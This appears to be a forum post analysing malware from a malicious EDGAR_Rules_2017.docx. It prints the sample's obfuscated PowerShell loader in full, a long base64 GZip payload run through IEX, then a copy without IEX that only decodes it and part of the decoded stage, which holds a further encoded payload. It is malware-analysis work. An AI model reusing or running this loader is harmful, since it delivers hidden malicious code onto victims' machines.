Decoding scripts from EDGAR_Rules_2017.docx (Special Samples: 2 Malware Without Macros)

Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,513
The malware was analyzed here:
Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'EDGAR_Rules_2017.docx'
.
So, I looked at 'Extracted Strings' section of the above analysis and found interesting string:
Code: 
$data=[System.Convert]::FromBase64String('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');
$ms=New-Object System.IO.MemoryStream;
$ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;
$cs=New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);
$sr=New-Object System.IO.StreamReader($cs);
IEX($sr.readtoend())
.
First I simply thought, that the long string 'H4sIAAAAAAAEANVZ...NU9miIAAA==' could be decoded by BASE64 Decode, but it failed. So, I looked at the end:
Code: 
$ms.Seek(0,0)|Out-Null;$cs=New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);
$sr=New-Object System.IO.StreamReader($cs);IEX($sr.readtoend())
.
Was the long string compressed by GZip? If so, then it could be decompressed by the initial code, slightly modified (without IEX on the end):
Code: 
$data=[System.Convert]::FromBase64String('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');
$ms=New-Object System.IO.MemoryStream;
$ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;
$cs=New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);
$sr=New-Object System.IO.StreamReader($cs);
$sr.readtoend())
.
Voila, it worked. Here is a decoded part:
Code: 
$ServiceCode = @'
$data=[System.Convert]::FromBase64String('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
